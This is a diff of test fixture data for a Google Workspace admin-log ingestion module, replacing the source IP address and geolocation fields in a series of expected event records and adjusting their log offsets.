@@ -583,7 +543,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"1\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"1\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "event.provider": "admin", "event.type": [ "info" 
@@ -597,26 +557,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 4020, + "log.offset": 4010, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -637,7 +593,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "event.provider": "admin", "event.type": [ "info", 
@@ -651,27 +607,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 4499, + "log.offset": 4488, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -695,7 +647,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CANCEL_USER_INVITE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CANCEL_USER_INVITE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -709,27 +661,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 4937, + "log.offset": 4925, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -753,7 +701,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_CUSTOM_FIELD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_CUSTOM_FIELD\",\"value\":\"custom\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_CUSTOM_FIELD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_CUSTOM_FIELD\",\"value\":\"custom\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -769,27 +717,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5364, + "log.offset": 5351, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -813,7 +757,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_EXTERNAL_ID\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_EXTERNAL_ID\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -828,27 +772,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5868, + "log.offset": 5854, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -872,7 +812,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_GENDER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_GENDER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -887,27 +827,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 6325, + "log.offset": 6310, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -931,7 +867,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_IM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_IM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -946,27 +882,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 6777, + "log.offset": 6761, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -990,7 +922,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ENABLE_USER_IP_WHITELIST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ENABLE_USER_IP_WHITELIST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -1005,27 +937,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 7225, + "log.offset": 7208, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1049,7 +977,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_KEYWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_KEYWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -1064,27 +992,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 7683, + "log.offset": 7665, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1108,7 +1032,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LANGUAGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LANGUAGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -1123,27 +1047,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 8136, + "log.offset": 8117, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1167,7 +1087,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LOCATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LOCATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -1182,27 +1102,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 8590, + "log.offset": 8570, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1226,7 +1142,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ORGANIZATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ORGANIZATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -1241,27 +1157,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 9044, + "log.offset": 9023, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
